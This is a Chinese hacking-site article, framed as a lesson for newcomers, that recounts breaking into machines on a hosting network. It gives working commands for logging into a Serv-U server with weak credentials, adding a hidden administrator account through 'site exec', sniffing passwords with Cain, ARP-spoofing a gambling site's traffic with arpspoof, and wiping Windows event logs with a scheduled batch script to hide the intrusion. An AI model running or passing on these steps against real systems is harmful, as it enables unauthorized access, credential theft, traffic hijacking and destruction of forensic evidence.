常用工具: 网吧管理 | 手机工具 | 上网必备 | 图像处理 | 视频工具 | 音频工具 | MSN 专区 | 办公软件 | 行政管理 | 商业贸易 | 股票彩票
黑客软件: 入侵攻击 | 木马病毒 | 游戏外挂 | 密码破解 | 探嗅监听 | 漏洞扫描 | 在线视频 | 远程控制 | 其它黑软 | 加密解密 | 漏洞利用
新闻文章: 安全报告 | 西盟新闻 | 工具介绍 | 网络安全 | OICQ秘籍 | 免费资源 | 菜鸟文摘 | 数据安全 | 最近更新 | RSS订阅 | 菜鸟编程
西盟网络(ZmKe.CoM)成立于2006年,经过数年发展已成为国内知名IT门户及知名域名空间运营商.我们将坚持创新.打造一流网络平台! |
注:本文适合新人学习.
前几天看上了一个SF发布的站点,被在它同一网段上发现有个赌博站.
(我最讨厌赌博站,害人的站点)
之后我看了一下那个SF发布站,本来想从这个站入手,但是做了防注,之后我又下了它论坛的YXBBS程序.可惜..............还是没搞下.
无奈....
旁注? 用工具检测不出有任何站点绑定在上面只好拿出最后的手段ARP或者嗅探了...
用流光扫了一下和他同段的机器.发现大多都开了3389.
又搞到一个servu6.3弱口令的机器. 老方法看看有执行权限没.
进入CMD
输入用户:admin
密码:123456
cd c:
竟然ok ,看来有希望
继续
cd windows
cd system32
进入到system32目录了
用queto site exec net.exe user xiaoshi xiaoshi /add
添加用户
queto site exec net.exe localgroup administrators xiaoshi /add
提升权限
ok
提示250.
登陆3389..........
目的是和这个肉鸡相隔4个IP的站 这个肉鸡的D段为13 目标为9
装上4.7汉化版的cain.(因为比较方便不像ARPSNIFFER需要多开窗口,但是容易被发现)
扫了一下MAC地址,发现很多,基本上 255个IP都是.
开始嗅吧....等者我们的肉鸡上来,哈哈....
等了将近一个小时截取到RDP数据10个 都没获得密码,或许是因为没有登陆只是用连接了一下吧
后来我嗅了一晚上,什么都没搞到,http到搞到不少截取了一个有用的密码 但是是40位的....无奈.
今天早上起来,首先去看一下肉鸡丢了没,没丢..
之后上传了arpspoof.exe 因为这段有赌博站.欺骗它.
进入cmd输入
arpspoof XXX.XX.XX.1 XXX.XX.XX.XXX.41(赌博站的IP) 80 0 1(1为单项欺骗) /r job.txt
开始欺骗,发送爆文.
打开站点开了一下,成功.
给我的感觉这段所有的机器都没做防ARP处理.....所以全部沦陷..... (大多都不是什么正规的站,基本上以赌博,色情为主的站)
感觉这次闹的挺大,我没做任何的跳板与代理.直接进入肉鸡的.如果被XXX
那我的青春就VOVER了
清除日志....
用ClearLogs.exe传到肉鸡上(我先开始用了ASM写的工具,貌似不好用)
建立了一个批处理
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
我没上后门,所以只能用at命令了执行了
在CMD下输入at 8:40"C:\Documents and Settings\xiaoshi\桌面\clearlog\1.bat"
之后等到了8:38的时候我注销了用户 安全的退出.....
请遵守国家法律和互联网法规。
· 您将承担一切因您的行为、言论而直接或间接导致的民事或刑事法律责任.
· 留言板管理人员有权保留或删除其管辖留言中的任意内容.
· 本站提醒:不要进行人身攻击与无聊谩骂。谢谢配合!
注意:系统启用了静态/缓存功能,您的回复可能不能立即显示。
您当前的位置: